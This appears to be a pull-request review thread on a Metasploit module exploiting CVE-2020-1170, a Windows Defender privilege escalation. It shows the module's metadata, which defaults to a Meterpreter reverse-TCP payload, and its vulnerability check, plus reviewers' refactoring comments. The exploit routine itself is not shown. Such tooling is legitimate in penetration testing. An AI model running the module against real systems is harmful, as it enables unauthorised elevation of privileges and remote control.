modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,203 @@
+          },
+          'License' => MSF_LICENSE,
+          'Author' =>
+              [
+                'itm4n', # Original bug finder
+                'gwillcox-r7' # msf module
+              ],
+          'Platform' => ['win'],
+          'SessionTypes' => ['meterpreter'],
+          'Privileged' => true,
+          'Arch' => [ARCH_X86, ARCH_X64],
+          'Targets' =>
+              [
+                [ 'Windows DLL Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
+              ],
+          'DefaultTarget' => 0,
+          'DisclosureDate' => '2020-06-09',
+          'References' =>
+              [
+                ['CVE', '2020-1170'],
+                ['URL', 'https://itm4n.github.io/cve-2020-1170-windows-defender-eop/'],
+                ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
+              ],
+          'Notes' =>
+              {
+                'SideEffects' => [ ARTIFACTS_ON_DISK ],
+                'Reliability' => [ REPEATABLE_SESSION ],
+                'Stability' => [ CRASH_SAFE ]
+              },
+          'DefaultOptions' =>
+              {
+                'EXITFUNC' => 'thread',
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+                'WfsDelay' => 900
+              }
+        )
+    )
+  end
+
+  def check
+    sysinfo_value = sysinfo['OS']
+
+    if sysinfo_value !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
+    end
+
+    mprun_file_version = file_version('C:\\Program Files\\Windows Defender\\MpCmdRun.exe')
+    mprun_file_version.pop # Remove last element, the branch. We aren't interested in it.
+    gem_version_mpfile = Gem::Version.new(mprun_file_version.join('.')) # Taken from https://stackoverflow.com/questions/4018689/ruby-combining-an-array-into-one-string
+    print_status("Version #{gem_version_mpfile} of MpCmdRun.exe detected on target!")
+    if gem_version_mpfile >= Gem::Version.new('4.18.2005.1')
+      return CheckCode::Safe
+    else
+      signature_update_command_result = cmd_exec('C:\\Program Files\\Windows Defender\\MpCmdRun.exe -SignatureUpdate')
+      if signature_update_command_result =~ /800106BA/ # Error code 0x800106BA occurs when another security product is installed according
+        # to https://answers.microsoft.com/en-us/windows/forum/windows_vista-security/windows-defender-error-0x800106ba/0e2f4e98-4e5f-4991-8994-0f8c80784547
+        print_error('The target has an outdated version of MpCmdRun.exe installed but they have another AV installed.')
+        return CheckCode::Safe
+      else
+        print_good('Target appears to have an outdated version of MpCmdRun.exe that is being actively used.')
+        return CheckCode::Appears
+      end
+    end
```

Comment:
```suggestion
    if gem_version_mpfile >= Gem::Version.new('4.18.2005.1')
      return CheckCode::Safe
    end

    signature_update_command_result = cmd_exec('C:\\Program Files\\Windows Defender\\MpCmdRun.exe -SignatureUpdate')
    if signature_update_command_result =~ /800106BA/ # Error code 0x800106BA occurs when another security product is installed according
      # to https://answers.microsoft.com/en-us/windows/forum/windows_vista-security/windows-defender-error-0x800106ba/0e2f4e98-4e5f-4991-8994-0f8c80784547
      print_error('The target has an outdated version of MpCmdRun.exe installed but they have another AV installed.')
      return CheckCode::Safe
    end

    print_good('Target appears to have an outdated version of MpCmdRun.exe that is being actively used.')
    return CheckCode::Appears
```

Reply:
Good point, there is no need for that extra `else` condition. I'm also going to update the command here whilst I'm at it as I found a better way of testing the condition we need to check here without the possibility of potentially adding more data to the MpCmdRun.log file and causing it to go over 16 MB (if its on the edge of going over by some odd happenstance).

Reply:
Ok should be fixed with next commit, which removes the `else` condition and introduces the use of the PowerShell command `Get-MpComputerStatus` to figure out if the target has Windows Defender enabled or not.